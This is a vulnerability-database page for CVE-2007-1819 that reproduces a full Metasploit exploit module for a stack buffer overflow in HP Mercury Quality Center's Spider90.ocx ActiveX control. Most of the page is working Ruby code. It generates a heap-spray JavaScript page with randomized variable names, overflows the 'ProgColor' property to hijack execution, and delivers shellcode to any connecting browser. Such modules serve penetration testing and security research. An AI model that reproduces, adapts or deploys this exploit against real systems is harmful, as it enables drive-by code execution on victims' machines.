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HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
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HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow. This module exploits a stack-based buffer overflow in SPIDERLib.Loader ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD) for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and 8.2 SP1 before Patch 32. By setting an overly long value to 'ProgColor', an attacker can overrun a buffer and execute arbitrary code

Code

                                                ##
# $Id: hpmqc_progcolor.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack-based buffer overflow in SPIDERLib.Loader
				ActiveX control (Spider90.ocx) 9.1.0.4353 installed by TestDirector (TD)
				for Hewlett-Packard Mercury Quality Center 9.0 before Patch 12.1, and
				8.2 SP1 before Patch 32.
				By setting an overly long value to 'ProgColor', an attacker can overrun
				a buffer and execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'Trancer <mtrancer[at]gmail.com>' ],
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2007-1819' ],
					[ 'OSVDB', '34317'],
					[ 'BID', '23239' ],
					[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=497' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'         => 1024,
					'BadChars'      => "\x00\x09\x0a\x0d'\\",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 64, 'Ret' => 0x0C0C0C0C } ]
				],
			'DisclosureDate' => 'Apr 4 2007',
			'DefaultTarget'  => 0))
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)
		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Setup exploit buffers
		nops 	  = Rex::Text.to_unescape([target.ret].pack('V'))
		ret  	  = Rex::Text.uri_encode([target.ret].pack('L'))
		blocksize = 0x40000
		fillto    = 500
		offset 	  = target['Offset']

		# Randomize the javascript variable names
		mqcontrol    = rand_text_alpha(rand(100) + 1)
		j_shellcode  = rand_text_alpha(rand(100) + 1)
		j_nops       = rand_text_alpha(rand(100) + 1)
		j_headersize = rand_text_alpha(rand(100) + 1)
		j_slackspace = rand_text_alpha(rand(100) + 1)
		j_fillblock  = rand_text_alpha(rand(100) + 1)
		j_block      = rand_text_alpha(rand(100) + 1)
		j_memory     = rand_text_alpha(rand(100) + 1)
		j_counter    = rand_text_alpha(rand(30) + 2)
		j_ret        = rand_text_alpha(rand(100) + 1)

		# Build out the message
		content = %Q|<html>
<object classid='clsid:98C53984-8BF8-4D11-9B1C-C324FCA9CADE' id='#{mqcontrol}'></object>
<script language='javascript'>
#{j_shellcode} = unescape('#{shellcode}');
#{j_nops} = unescape('#{nops}');
#{j_headersize} = 20;
#{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
#{j_fillblock} = #{j_nops}.substring(0, #{j_slackspace});
#{j_block} = #{j_nops}.substring(0, #{j_nops}.length - #{j_slackspace});
while(#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
#{j_memory} = new Array();
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode};
#{j_ret} = unescape('#{ret}');
while (#{j_ret}.length < #{offset}) #{j_ret} += #{j_ret};
#{mqcontrol}.ProgColor = #{j_ret};
</script>
</html>
|

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end

                              

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